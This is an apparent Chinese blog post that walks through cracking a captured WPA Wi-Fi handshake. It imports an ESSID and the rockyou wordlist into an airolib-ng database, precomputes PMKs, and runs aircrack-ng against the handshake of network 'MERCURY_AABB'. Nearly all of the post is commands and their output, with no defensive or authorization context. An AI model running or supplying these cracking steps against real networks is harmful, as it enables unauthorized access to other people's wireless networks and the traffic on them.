admin管理员组

文章数量:1574959

wpa-01.cap 握手包
essid.txt 写入wifi的ESSID(wifi名称)
passwdlist.txt 需要字典

# airolib-ng wifidb --import essid essid.txt
# airolib-ng wifidb --import passwd /usr/share/wordlists/rockyou.txt
# airolib-ng wifidb --batch

Computed 9611374 PMK in 28715 seconds (334 PMK/s, 0 in buffer). All ESSID processed.

wifidb #创建数据库名称
--import [essid|passwd] <file>
导入文件
–batch #对所有ESSID和密码组合进行批处理操作

# airolib-ng wifidb --stats
– status 校验数据库

There are 1 ESSIDs and 9611374 passwords in the database. 9611374 out of 9611374 possible combinations have been computed (100%).

ESSID   Priority    Done
MERCURY_AABB    64  100.0

wif 密码破解
# aircrack-ng -r wifidb -e MERCURY_AABB /root/wpa-01.cap

[00:00:00] 190371/0 keys tested (200208.22 k/s) 

参考:
1.Aircrack-ng之Airolib-ng命令

本文标签: wifiairolibNG